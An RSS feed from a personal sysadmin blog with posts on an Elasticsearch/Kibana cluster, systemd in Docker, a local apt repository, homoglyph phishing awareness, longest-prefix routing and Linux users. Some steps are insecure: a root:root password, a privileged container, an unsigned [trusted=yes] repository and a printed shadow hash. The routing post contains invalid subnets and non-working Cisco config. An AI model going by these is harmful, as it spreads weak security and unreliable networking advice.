ip              heap.percent ram.percent cpu load_1m load_5m load_15m node.role   master name
192.168.234.130           19          89  88    1.30    0.80     0.37 cdfhilmrstw -      node-3
192.168.234.129           24          89   9    0.29    0.17     0.13 cdfhilmrstw -      node-2
192.168.234.128           10          90  17    0.00    0.00     0.00 cdfhilmrstw *      node-1
</code></pre>
<p>Check the cluster health:</p>
<pre><code class="lang-plaintext">curl -u elastic:your_pass http://192.168.234.128:9200/_cluster/health?pretty
==============================================================================
{
  "cluster_name" : "es-cluster",
  "status" : "green",
  "timed_out" : false,
  "number_of_nodes" : 3,
  "number_of_data_nodes" : 3,
  "active_primary_shards" : 3,
  "active_shards" : 6,
  "relocating_shards" : 0,
  "initializing_shards" : 0,
  "unassigned_shards" : 0,
  "unassigned_primary_shards" : 0,
  "delayed_unassigned_shards" : 0,
  "number_of_pending_tasks" : 0,
  "number_of_in_flight_fetch" : 0,
  "task_max_waiting_in_queue_millis" : 0,
  "active_shards_percent_as_number" : 100.0
}
</code></pre>
<h1 id="heading-kibana-integration"><strong>Kibana Integration</strong></h1>
<p>For security reasons, the <code>elastic</code> account cannot be used with Kibana; instead, the built-in <code>kibana_system</code> account is utilized.</p>
<p>Reset the password for the <code>kibana_system</code> account:</p>
<pre><code class="lang-plaintext">sudo /usr/share/elasticsearch/bin/elasticsearch-reset-password -u kibana_system -i
</code></pre>
<h2 id="heading-download-and-install-kibana">Download and install Kibana</h2>
<p>The Debian package for Kibana 9.1.0 can be downloaded from the website and installed as follows:</p>
<pre><code class="lang-sh">wget https://artifacts.elastic.co/downloads/kibana/kibana-9.1.0-amd64.deb
shasum -a 512 kibana-9.1.0-amd64.deb
sudo dpkg -i kibana-9.1.0-amd64.deb
</code></pre>
<h2 id="heading-configure-kibanayml"><strong>Configure kibana.yml</strong></h2>
<p><strong>kibana.yml</strong></p>
<pre><code class="lang-plaintext">server.port: 5601
server.host: "0.0.0.0"
elasticsearch.hosts: ["http://192.168.234.128:9200","http://192.168.234.129:9200","http://192.168.234.130:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "your_pass"
</code></pre>
<h4 id="heading-kibana-startup"><strong>Kibana Startup</strong></h4>
<pre><code class="lang-plaintext">cd /opt/kibana
nohup bin/kibana &amp;
</code></pre>
<p>Now, access <a target="_blank" href="http://192.168.234.128:5601">http://192.168.234.128:5601</a> (or the IP address of the node where Kibana is installed) in a web browser and log in with the elastic account.</p>
<h1 id="heading-troubleshoot-common-problem">Troubleshoot common problem</h1>
<p>When joining new node to cluster, you just need to copy the certificates <code>elastic-stack-ca.p12</code> to your new node.</p>
<p>However, when initialize a node, elasticsearch already create an <code>elasticsearch.keystore</code> file and it will ask for previous keystore password.</p>
<pre><code class="lang-plaintext">Caused by: org.elasticsearch.common.ssl.SslConfigException: cannot read configured [PKCS12] keystore (as a truststore) [/etc/elasticsearch/certs/elastic-certificates.p12] - this is usually caused by an incorrect password; (a keystore password was provided)

        at org.elasticsearch.common.ssl.SslFileUtil.ioException(SslFileUtil.java:58) ~[?:?]
</code></pre>
<p>You need to recreate a new <code>elasticsearch.keystore</code> and tell it to use blank password.</p>
<pre><code class="lang-plaintext"># Remove the transport layer keystore
rm /etc/elasticsearch/elasticsearch.keystore

# Add the password for the transport layer keystore
/usr/share/elasticsearch/bin/elasticsearch-keystore add xpack.security.transport.ssl.keystore.secure_password
The elasticsearch keystore does not exist. Do you want to create it? [y/N]y
Enter value for xpack.security.transport.ssl.keystore.secure_password:

/usr/share/elasticsearch/elasticsearch-keystore add xpack.security.transport.ssl.truststore.secure_password
Enter value for xpack.security.http.ssl.truststore.secure_password:
</code></pre>
<p>You will be prompted to enter the password for your <code>.p12</code> file for each command. <strong>Enter the same password you created when you generated the certificate.</strong></p>
<p>Or if you leave the password blank, just press Enter.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>I introduced a simple way to install Elasticsearch and Kibana and set up a cluster.</p>
<p>The archive installation method is easy to install and manage, making it useful in various environments. Hope you find it helpful!</p>
]]></content:encoded></item><item><title><![CDATA[Run systemctl inside a docker container]]></title><description><![CDATA[Why systemd is tricky in Docker
systemd is designed to be a system init manager for an entire operating system, and Docker containers are designed to run a single process. This mismatch makes running systemd inside Docker non-trivial. However, it is ...]]></description><link>https://chinhnd.org/run-systemctl-inside-a-docker-container</link><guid isPermaLink="true">https://chinhnd.org/run-systemctl-inside-a-docker-container</guid><category><![CDATA[Docker]]></category><category><![CDATA[System Architecture]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Sun, 15 Sep 2024 12:07:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/HSACbYjZsqQ/upload/732523e86a5599c92820669b3e02921a.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-why-systemd-is-tricky-in-docker">Why <code>systemd</code> is tricky in Docker</h1>
<p><code>systemd</code> is designed to be a system init manager for an entire operating system, and Docker containers are designed to run a single process. This mismatch makes running <code>systemd</code> inside Docker non-trivial. However, it is possible with some adjustments, and I will walk you through the process.</p>
<h1 id="heading-prerequisites">Prerequisites</h1>
<ul>
<li><p>Ensure you have Docker installed on your machine.</p>
</li>
<li><p>Familiarity with Docker commands.</p>
</li>
</ul>
<h1 id="heading-guide-to-run-systemd-in-an-ubuntu-docker-container">Guide to Run <code>systemd</code> in an Ubuntu Docker Container</h1>
<ol>
<li>Create <code>Dockerfile</code> is required like below:</li>
</ol>
<pre><code class="lang-dockerfile"><span class="hljs-keyword">FROM</span> ubuntu:<span class="hljs-number">22.04</span>

<span class="hljs-keyword">RUN</span><span class="bash"> <span class="hljs-built_in">echo</span> <span class="hljs-string">'root:root'</span> | chpasswd</span>
<span class="hljs-keyword">RUN</span><span class="bash"> <span class="hljs-built_in">printf</span> <span class="hljs-string">'#!/bin/sh\nexit 0'</span> &gt; /usr/sbin/policy-rc.d</span>
<span class="hljs-keyword">RUN</span><span class="bash"> apt-get update</span>
<span class="hljs-keyword">RUN</span><span class="bash"> apt-get install -y systemd systemd-sysv dbus dbus-user-session</span>
<span class="hljs-keyword">RUN</span><span class="bash"> <span class="hljs-built_in">printf</span> <span class="hljs-string">"systemctl start systemd-logind"</span> &gt;&gt; /etc/profile</span>

<span class="hljs-keyword">ENTRYPOINT</span><span class="bash"> [<span class="hljs-string">"/sbin/init"</span>]</span>
/sbin/init is important to init systemd and enable systemctl.
</code></pre>
<p>/sbin/init is important to init systemd and enable systemctl.</p>
<ol start="2">
<li>Then build the system.</li>
</ol>
<pre><code class="lang-bash">docker build -t chinhnd/ubuntu-systemd -f Dockerfile .
docker run -it --privileged --cap-add=ALL chinhnd/ubuntu-systemd
</code></pre>
<h1 id="heading-access-the-running-container">Access the running container</h1>
<p>Now that your container is running <code>systemd</code>, you can access it and use <code>systemctl</code> inside the container.</p>
<ol>
<li><p><strong>Enter the container</strong>:</p>
<pre><code class="lang-bash"> docker <span class="hljs-built_in">exec</span> -it &lt;container_id&gt; bash
</code></pre>
<p> Replace <code>&lt;container_id&gt;</code> with the actual container ID from the <code>docker ps</code> output.</p>
<p> Then log in with root/root.</p>
</li>
<li><p><strong>Check if</strong> <code>systemd</code> is running:</p>
<p> Inside the container, run:</p>
<pre><code class="lang-bash"> systemctl
</code></pre>
<p> If everything is set up correctly, you should see the output from <code>systemctl</code> showing the system services running.</p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[The simplest way to locally distribute Debian packages]]></title><description><![CDATA[Sometime, you will need to install some packages on a remote machine without internet access.
Or, you want to distribute your own Debian packages in your environment.
The simplest way to do it is to setup your own local repository.

Requirements

pyt...]]></description><link>https://chinhnd.org/the-simplest-way-to-locally-distribute-debian-packages</link><guid isPermaLink="true">https://chinhnd.org/the-simplest-way-to-locally-distribute-debian-packages</guid><category><![CDATA[Linux]]></category><category><![CDATA[debian package]]></category><category><![CDATA[debian]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Tue, 09 Jul 2024 11:00:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/S6OvsSwm5sE/upload/e7c546a3d2d2db179159346634599e46.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Sometime, you will need to install some packages on a remote machine without internet access.</p>
<p>Or, you want to distribute your own Debian packages in your environment.</p>
<p>The simplest way to do it is to setup your own local repository.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720521730143/e9e3fd4a-4cb8-4d31-abad-4509d71c5313.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-requirements"><strong>Requirements</strong></h1>
<ul>
<li><p>python3</p>
</li>
<li><p>dpkg-scanpackages: <code>sudo apt-get install dpkg-dev</code></p>
</li>
<li><p>gzip: <code>sudo apt-get install gzip</code></p>
</li>
</ul>
<h1 id="heading-create-your-repository-folder-structure"><strong>Create your</strong> repository folder <strong>structure</strong></h1>
<p>You can customize it, but I will keep my structure quick and simple:</p>
<p><code>mkdir ~/my_repo/debian</code></p>
<p>Then go to that directory:</p>
<p><code>cd my_repo</code></p>
<h1 id="heading-add-your-deb-files-to-the-debian-folder"><strong>Add your .deb files to the debian folder</strong></h1>
<p><code>cp my_deb_thing.deb my_deb_thing2.deb my_repo/debian</code></p>
<p>In this example, 2 have put 2 packages for kibana and elasticsearch to the <code>debian</code> folder.</p>
<h1 id="heading-create-packagesgz-file"><strong>Create Packages.gz file</strong></h1>
<p>You'll need to do this every time you add/update a .deb.</p>
<p><code>dpkg-scanpackages debian /dev/null | gzip -9c &gt; debian/Packages.gz</code></p>
<p>You'll get an output similar to:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720520722704/af4a04a4-d749-44f7-b201-f2c5f3cc5105.png" alt class="image--center mx-auto" /></p>
<p><code>dpkg-scanpackages</code> will create indices for your packages so Debian package manager can read it.</p>
<h1 id="heading-run-a-webserver-to-host-it"><strong>Run a webserver to host it</strong></h1>
<p>Any webserver will do, simply used Python.</p>
<p><code>python3 -m http.server 9000</code></p>
<p>The port can be change accordingly.</p>
<h1 id="heading-configure-client-machines-to-point-to-your-debian-repository"><strong>Configure client machines to point to your debian repository</strong></h1>
<p>Add to client machine <code>/etc/apt/sources.list</code></p>
<p><code>deb [trusted=yes]</code><a target="_blank" href="http://10.10.80.129:9000"><code>http://your-server-ip:9000</code></a><code>debian/</code></p>
<p>Note that the packages will be non authenticated, so if you want to stop having warnings you'll need to add the [trusted=yes]</p>
<p>When update, we will see client getting packages:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720521173532/631bb805-4cb9-4ff1-8cd5-944d34b8d83c.png" alt class="image--center mx-auto" /></p>
<p>Then client can install package using APT package manager, just like a normal packages.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720521939337/df799f32-c8ce-4817-8242-36b4f0d403ee.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>In this post, I show you a quick and easy way to host your own APT repo.</p>
<p>However, for the sake of simplicity, I didn't use any proper webserver; and I didn't secure the distribution process.</p>
<p>There are more secure method like <code>apt-mirror</code> or <code>rerepo</code> and add your own GPG key.</p>
]]></content:encoded></item><item><title><![CDATA[Beware behind the look: Cyrillic Characters in Phishing Emails]]></title><description><![CDATA[One tactic gaining traction is the use of Cyrillic characters to create deceptive domain names in email addresses and website links.
What are Cyrillic Characters?
Cyrillic is an alphabet used in many Eastern European and Slavic languages like Russian...]]></description><link>https://chinhnd.org/beware-behind-the-look-cyrillic-characters-in-phishing-emails</link><guid isPermaLink="true">https://chinhnd.org/beware-behind-the-look-cyrillic-characters-in-phishing-emails</guid><category><![CDATA[securityawareness]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 13 Jun 2024 07:21:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/LPZy4da9aRo/upload/41316b11c3f6a26e7bd8c662fdb72c9c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>One tactic gaining traction is the use of Cyrillic characters to create deceptive domain names in email addresses and website links.</p>
<h1 id="heading-what-are-cyrillic-characters"><strong>What are Cyrillic Characters?</strong></h1>
<p>Cyrillic is an alphabet used in many Eastern European and Slavic languages like Russian, Ukrainian, and Bulgarian.</p>
<p>While some Cyrillic letters resemble Latin characters, they represent entirely different sounds.</p>
<p>This similarity is what phishers exploit.</p>
<h1 id="heading-how-do-they-trick-you"><strong>How Do They Trick You?</strong></h1>
<p>Phishers substitute certain Cyrillic characters for their Latin counterparts in domain names. For example, I can create a lookalike domain to my blog using Russian letter.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718262144092/5ad9dc6e-2fbf-4ae4-bb4c-eb039cc0814c.png" alt class="image--center mx-auto" /></p>
<p>Unaware users might not notice the subtle difference and click on the link, leading them to a fake website designed to steal login credentials, credit card details, or other sensitive information.</p>
<h1 id="heading-a-real-example">A Real Example</h1>
<p>In the screenshot below, we see a message supposedly sent from the domain <a target="_blank" href="http://apple.com">apple.com</a>. It looks really legitimate.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718262705115/400e1688-ba31-4d6d-ad55-0ffb0c51bd4d.png" alt class="image--center mx-auto" /></p>
<p>However, the logo looks cut off and email design is unusual.</p>
<p>The fact is that the <a target="_blank" href="http://apple.com">apple.com</a> domain we saw above was not legitimate, because the characters are in fact the Cyrillic letters instead of real “р”!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718261205997/7cd09c20-9964-4243-8613-cdaaef723b89.png" alt class="image--center mx-auto" /></p>
<p>Some browser or email client really don't have a way to properly display these character, so they might look exactly like Latin letters.</p>
<p>Only after you paste this domain to application that support this alphabet, you can see the differences.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718262657388/2b2e82f0-f341-4eba-b817-91566a6dc3e3.png" alt class="image--center mx-auto" /></p>
<p>There are glyph characters that looks like English or Latin characters, for example:</p>
<p><img src="https://d2dzik4ii1e1u6.cloudfront.net/images/lexology/static/fe8ed7d0-0563-4d94-9d81-da55b09900c6.JPG" alt /></p>
<h1 id="heading-how-to-protect-yourself"><strong>How to Protect Yourself</strong></h1>
<p>Here are some tips to stay safe from Cyrillic character phishing:</p>
<ul>
<li><p><strong>Inspect Sender Addresses Closely:</strong> Don't rely solely on the displayed name. Hover over the sender address to see the actual email address. Look for any inconsistencies or unusual characters, especially Cyrillic letters where Latin characters would be expected.</p>
</li>
<li><p><strong>Scrutinize Website Links:</strong> Before clicking a link, hover over it to see the actual URL displayed at the bottom of your browser window. Be wary of any URLs with Cyrillic characters or slight misspellings of legitimate website names.</p>
</li>
<li><p><strong>Think Before You Click:</strong> If an email seems suspicious, especially one with an urgent tone or a tempting offer, don't click on any links or attachments. It's better to be safe than sorry.</p>
</li>
<li><p><strong>Verify Information Independently:</strong> If an email appears to be from a legitimate source like your bank, don't click on any links within the email. Instead, log in to your account directly by typing the website address into your browser window or using the official app.</p>
</li>
<li><p><strong>Use Security Software:</strong> Consider using antivirus and anti-phishing software that can help identify and block malicious websites.</p>
</li>
</ul>
<h1 id="heading-stay-vigilant"><strong>Stay Vigilant!</strong></h1>
<p>By being aware of this tactic and following these simple tips, you can significantly reduce your risk of falling victim to Cyrillic character phishing scams.</p>
<p>Remember, cybercriminals are constantly evolving their methods, so staying vigilant and practicing good security habits is crucial in protecting your information.</p>
]]></content:encoded></item><item><title><![CDATA[How Longest prefix matching effect routing]]></title><description><![CDATA[When will two routes considered duplicated?
Route duplication is a situation where two or more routes to the same destination exist in a routing table.
This can happen for several reasons, such as misconfiguration, or the use of overlapping prefixes ...]]></description><link>https://chinhnd.org/how-longest-prefix-matching-effect-routing</link><guid isPermaLink="true">https://chinhnd.org/how-longest-prefix-matching-effect-routing</guid><category><![CDATA[networking]]></category><category><![CDATA[routing]]></category><category><![CDATA[network]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Mon, 16 Oct 2023 04:07:57 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/7nrsVjvALnA/upload/6c11bb8e4a3e42f45f6f608448dc918c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-when-will-two-routes-considered-duplicated">When will two routes considered duplicated?</h1>
<p>Route duplication is a situation where <strong>two or more routes to the same destination exist in a routing table</strong>.</p>
<p>This can happen for several reasons, such as misconfiguration, or the use of overlapping prefixes in different networks.</p>
<p>In some cases, it may be necessary to have two routes to the same destination, such as for load balancing or redundancy. However, in most cases, having duplicate routes is not necessary and can lead to problems.</p>
<p>Route duplication can cause many problems, including routing loops, black holes, and performance problems. It is important to detect and avoid route duplication to ensure the smooth operation of your network.</p>
<h1 id="heading-longest-prefix-matching">Longest prefix matching</h1>
<p>Longest prefix matching (LPM) is a fundamental concept in networking that plays a critical role in IP routing. It allows for the efficient forwarding of packets, enables complex network policies, and is essential for the operation of the Internet.</p>
<p>In packet routing, there is a possibility of overlapping entries in the routing table. As a result, we must pick an IP prefix that is more specific to the destination address.</p>
<p>For example, suppose you want to send a letter to City A and District B and there are two possible mailmen to choose from:</p>
<ul>
<li><p>The first mailman can hand over his letter to your destination, who works in a post office in city A. He has to search the hold city to find the receiver.</p>
</li>
<li><p>Another mailman works in a particular district B of that city. He lives in the same neighborhood and knows exactly where to find the receiver.</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1695788083668/f6a7d4de-697e-499d-9853-6fb6bacbc5ca.png" alt class="image--center mx-auto" /></p>
<p>As a result, giving the letter to the second person is more efficient because he handles more localized regions.</p>
<p>LPM works in the same way. By comparing the destination IP address of a packet to the prefixes in a routing table, the router selects the route with <strong>the longest prefix or a more specific route</strong> that matches the destination IP address.</p>
<h2 id="heading-duplicate-routes">Duplicate routes</h2>
<p>For example, consider the following routing table:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Prefix</strong></td><td>Destination</td><td><strong>Next hop</strong></td></tr>
</thead>
<tbody>
<tr>
<td>192.168.1.0/24</td><td>192.168.1.100</td><td>192.168.1.1</td></tr>
<tr>
<td>192.168.0.0/16</td><td>192.168.1.100</td><td>192.168.0.1</td></tr>
</tbody>
</table>
</div><p>If the router receives a packet with the destination IP address 192.168.1.100, it will use the first route in the routing table, because it has <strong>the longest prefix that matches the destination IP address.</strong></p>
<p>The second route would also match the destination IP address, but it is less specific because it has a shorter prefix.</p>
<p>The longest prefix rule is used by all IP routers, regardless of the routing protocol that they are using. It is also used in other networking technologies, such as MPLS and BGP.</p>
<h2 id="heading-overlapping-subnets">Overlapping subnets</h2>
<p>The longest prefix rule can also be used to handle overlapping subnets. For example, consider the following subnets:</p>
<ul>
<li><p>192.168.1.0/23</p>
</li>
<li><p>192.168.1.128/24</p>
</li>
</ul>
<p>In this case, the two subnets overlap because the IP addresses 192.168.1.128 to 192.168.1.255 belong to both subnets. If a router on this network receives a packet with the destination IP address 192.168.1.130, it will use the longest prefix rule to determine which subnet to forward the packet to.</p>
<p>In this case, the longest prefix that matches the destination IP address is 192.168.1.128/24. Therefore, the router will forward the packet to the 192.168.1.128/24 subnet.</p>
<h1 id="heading-undesirable-routing-with-lpm">Undesirable routing with LPM</h1>
<p>When you already have a route to a specific host and a new route is received with a longer prefix, the new route will take precedence. This is because LPM always chooses the most specific route to forward a packet.</p>
<p>For example, consider the following scenario:</p>
<ul>
<li><p>You have a route with the prefix 192.168.1.0/24, and next-hop to 192.168.1.24</p>
</li>
<li><p>You receive a new route with the prefix 192.168.1.100/32, and next-hop to 192.168.1.28</p>
</li>
</ul>
<p>In this scenario, the new route with the prefix 192.168.1.100/32 will take precedence. This means that any packets destined for the host 192.168.1.100 will be forwarded to 192.168.1.28 even though you already have a route to the host 192.168.1.100 with the next-hop 192.168.1.24.</p>
<p>In real-world scenarios, network engineers often want a specific path to direct the traffic to and don't want the traffic to go to a new route. In this case, LPM behavior can be undesirable.</p>
<h1 id="heading-control-lpm-behavior">Control LPM behavior</h1>
<p>To prevent the router from using a new route with a longer prefix, you can use a routing policy. A routing policy is a set of rules that control how the router selects and forwards packets.</p>
<p>Here is an example of a route-map that prefers static routes over routes learned from routing protocols on Cisco syntax:</p>
<pre><code class="lang-bash">route-map PREFERED_ROUTES
  match ip address prefix-list PREFERED_ROUTES_LIST
  <span class="hljs-built_in">set</span> local-preference 100
!
interface Ethernet0/0
  ip route-policy PREFERED_ROUTES <span class="hljs-keyword">in</span>
end
</code></pre>
<p>This routing policy will match all packets that are destined for prefixes that are defined in the <code>prefix-list PREFERED_ROUTES_LIST</code>. For all matching packets, the routing policy will set the local preference to 100.</p>
<p>The local preference is a metric that is used by the router to select between multiple routes. A higher local preference indicates a more preferred route. Therefore, this routing policy will ensure that the router will always prefer static routes over routes learned from routing protocols.</p>
<p>This is just a simple example of manipulating the effect of LPM. You can use this to your advantage to create more complex routing policies.</p>
<p>It is important to note that if you have multiple routing policies configured on an interface, the router will apply the first routing policy that matches the packet.</p>
<h1 id="heading-advantages-and-disadvantages-of-lpm">Advantages and disadvantages of LPM</h1>
<p>LPM helps prevent duplicate routes in the routing table of a router. This is because LPM will always choose the most specific route to forward a packet. This comes with several benefits:</p>
<ul>
<li><p><strong>Improved performance:</strong> By using the most specific route, the router can forward packets more quickly and efficiently.</p>
</li>
<li><p><strong>Increased reliability:</strong> The longest prefix rule helps to reduce the chance of routing loops and other problems.</p>
</li>
<li><p><strong>Scalability:</strong> The longest prefix rule can be used to scale networks of any size.</p>
</li>
</ul>
<p>Despite that, there are a few potential negatives to using LPM:</p>
<ul>
<li><p><strong>Increased complexity:</strong> LPM can be more complex to implement than other routing algorithms, such as static routing. This is because LPM requires the router to maintain a trie of all of the prefixes in its routing table.</p>
</li>
<li><p><strong>Increased overhead:</strong> The router must perform a depth-first search of the trie to find the longest prefix that matches the destination IP address of the packet.</p>
</li>
<li><p><strong>Potential for routing loops:</strong> This can happen if there are two or more routes in the routing table that have the same prefix length and the next hop addresses for those routes are different.</p>
</li>
</ul>
<h1 id="heading-conclusion">Conclusion</h1>
<p>The longest prefix rule is an essential part of IP networking, and it is one of the key reasons why the Internet is able to work so well.</p>
<p>Overall, LPM is a powerful and efficient routing algorithm that offers a number of benefits. However, it is important to be aware of the behavior of LPM and take steps to mitigate any undesirable behavior.</p>
]]></content:encoded></item><item><title><![CDATA[Linux User management]]></title><description><![CDATA[What is a Linux user account?
A user account is a set of credentials that allow a user to log in to a Linux system and access its resources. Each user account has a unique username and password, as well as a set of permissions that determine what fil...]]></description><link>https://chinhnd.org/linux-user-management</link><guid isPermaLink="true">https://chinhnd.org/linux-user-management</guid><category><![CDATA[Linux]]></category><category><![CDATA[linux for beginners]]></category><category><![CDATA[linux-basics]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 05 Oct 2023 06:57:16 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/kuJkUTxR0z4/upload/4f6dc9fc31c05b5d3ea8f45301901926.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-a-linux-user-account"><strong>What is a Linux user account?</strong></h1>
<p>A user account is a set of credentials that allow a user to log in to a Linux system and access its resources. Each user account has a unique username and password, as well as a set of permissions that determine what files and directories the user can access and modify.</p>
<h1 id="heading-why-is-user-management-important"><strong>Why is user management important?</strong></h1>
<p>User management is important for several reasons:</p>
<ul>
<li><p><strong>Security:</strong> It helps to protect the system from unauthorized access and malicious activity.</p>
</li>
<li><p><strong>Resource management:</strong> It allows system administrators to control how resources are allocated to users.</p>
</li>
<li><p><strong>Collaboration:</strong> It facilitates collaboration between users by allowing them to share files and directories.</p>
</li>
</ul>
<h1 id="heading-types-of-users">Types of users</h1>
<p>There are three main types of users in Linux:</p>
<ul>
<li><p><strong>Root:</strong> The root user is the superuser, with full administrative privileges over the system.</p>
</li>
<li><p><strong>Regular users:</strong> Regular users have limited access to the system, but can gain administrative privileges by using the sudo command.</p>
</li>
<li><p><strong>Service users:</strong> Service users are used by system services to run in the background. They typically have limited access to the system and cannot log in directly.</p>
</li>
</ul>
<h2 id="heading-root-user"><strong>Root user</strong></h2>
<p>The root user is the most powerful user on a Linux system. It has full access to all files and directories and can run any command. The root user is typically used for system administration tasks, such as installing and configuring software, managing users and groups, and troubleshooting problems.</p>
<h2 id="heading-regular-users"><strong>Regular users</strong></h2>
<p>Regular users are used by everyday users to access the system. They have limited access to files and directories, and cannot run certain commands that could damage the system. Regular users can gain administrative privileges by using the sudo command. The sudo command allows regular users to run commands as the root user.</p>
<h2 id="heading-service-users"><strong>Service users</strong></h2>
<p>Service users are used by system services to run in the background. System services are programs that provide essential functionality for the system, such as networking, file sharing, and printing. Service users typically have limited access to the system and cannot log in directly.</p>
<h1 id="heading-how-to-create-delete-and-change-users-password">How to create, delete, and change users password</h1>
<p><strong>To change your own password</strong>, type the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">passwd</span>
</code></pre>
<p>You will be prompted to enter your current password and then your new password twice.</p>
<p><strong>To change the password of another user,</strong> replace <code>&lt;username&gt;</code> with the name of the user whose password you want to change:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> passwd &lt;username&gt;
</code></pre>
<p><strong>To create a new user account,</strong> use <code>adduser</code> and replace <code>&lt;username&gt;</code> with the name of the new user account:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> adduser &lt;username&gt;
</code></pre>
<p>You will be prompted to enter additional information about the new user account, such as a full name and a password.</p>
<p><strong>To delete a user account:</strong></p>
<ol>
<li><p>Open a terminal window.</p>
</li>
<li><p>Type the following command, replacing <code>&lt;username&gt;</code> with the name of the user account you want to delete:</p>
</li>
</ol>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> deluser &lt;username&gt;
</code></pre>
<p><strong>Important:</strong> Be careful when changing or resetting user passwords. If you make a mistake, you could lock yourself or other users out of the system.</p>
<h1 id="heading-user-id">User ID</h1>
<p>There are standard user ID (UID) ranges for each type of user in Linux:</p>
<ul>
<li><p><strong>Root user:</strong> UID 0</p>
</li>
<li><p><strong>Regular users:</strong> UIDs from 1000 onwards</p>
</li>
<li><p><strong>Service users:</strong> UIDs from 100 to 999</p>
</li>
</ul>
<p>You can check UID it using <code>cat /etc/passwd | grep &lt;username&gt;</code></p>
<pre><code class="lang-haskell"><span class="hljs-title">nguyenducchinh</span>@<span class="hljs-type">VM</span>:~$ cat /etc/passwd | grep nguyenducchinh
<span class="hljs-title">nguyenducchinh</span>:x:<span class="hljs-number">1000</span>:<span class="hljs-number">1000</span>:<span class="hljs-type">Nguyen</span> <span class="hljs-type">Duc</span> <span class="hljs-type">Chinh</span>,,,:/home/nguyenducchinh:/bin/bash
<span class="hljs-title">nguyenducchinh</span>@<span class="hljs-type">VM</span>:~$
</code></pre>
<h1 id="heading-understand-etcpasswd-file">Understand /etc/passwd file</h1>
<p>In the above example, you can see the different fields of <code>/etc/passwd</code>, separated by a colon.</p>
<pre><code class="lang-haskell"><span class="hljs-title">username</span>:password:<span class="hljs-type">UID</span>:<span class="hljs-type">GID</span>:'<span class="hljs-type">Description'</span>,,,:<span class="hljs-type">Home_directory</span>:shell
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696487020896/4deff32d-d4cc-454a-87f0-bf3d3ee551ab.png" alt class="image--center mx-auto" /></p>
<p>The fields are:</p>
<ul>
<li><p><strong>Username:</strong> The string that the user types when logging in. Usernames must be unique and can be up to 32 characters long.</p>
</li>
<li><p><strong>Password:</strong> In older Linux systems, the user's encrypted password was stored in the /etc/passwd file. However, newer systems store the password in the /etc/shadow file. The password field in /etc/passwd is typically set to the character <code>x</code>.</p>
</li>
<li><p><strong>User ID (UID):</strong> A unique number assigned to each user. The UID is used by the operating system to identify the user.</p>
</li>
<li><p><strong>Group ID (GID):</strong> The primary group of the user. The primary group is the group that the user belongs to by default.</p>
</li>
<li><p><strong>GECOS (comment field):</strong> A field that can contain additional information about the user, such as their full name, office phone number, and department.</p>
</li>
<li><p><strong>Home directory:</strong> The absolute path to the user's home directory. The home directory is the directory where the user's files are stored.</p>
</li>
<li><p><strong>Shell:</strong> The absolute path to the user's default shell. The shell is the program that the user uses to interact with the operating system. You can read about different shell in Linux <a target="_blank" href="https://blog.nguyenducchinh.com/linux-find-your-way-around-the-terminal">here in this blog post.</a></p>
</li>
</ul>
<h1 id="heading-understand-etcshadow-file">Understand /etc/shadow file</h1>
<p>The <code>/etc/shadow</code> file is a critical file in Linux systems that contains encrypted passwords for all user accounts. It is owned by the root user and only readable by the root user and the shadow group. It is used by the system to authenticate users and to prevent unauthorized access.</p>
<p>Let's see what's in it:</p>
<pre><code class="lang-haskell"><span class="hljs-title">nguyenducchinh</span>@<span class="hljs-type">VM</span>:~$ sudo cat /etc/shadow | grep nguyenducchinh
<span class="hljs-title">nguyenducchinh</span>:$y$j9T$<span class="hljs-type">AESKh04Gs0cVsWhla1K1B</span>/$<span class="hljs-type">Xx2PgDjaheI7VUviYM3OiT6k3loXAA2wGfhL6rzNe3</span>.:<span class="hljs-number">19618</span>:<span class="hljs-number">0</span>:<span class="hljs-number">99999</span>:<span class="hljs-number">7</span>:::
<span class="hljs-title">nguyenducchinh</span>@<span class="hljs-type">VM</span>:~$
</code></pre>
<p>The <code>/etc/shadow</code> file is a text file that contains one entry per user account. Each entry is made up of nine colon-separated fields:</p>
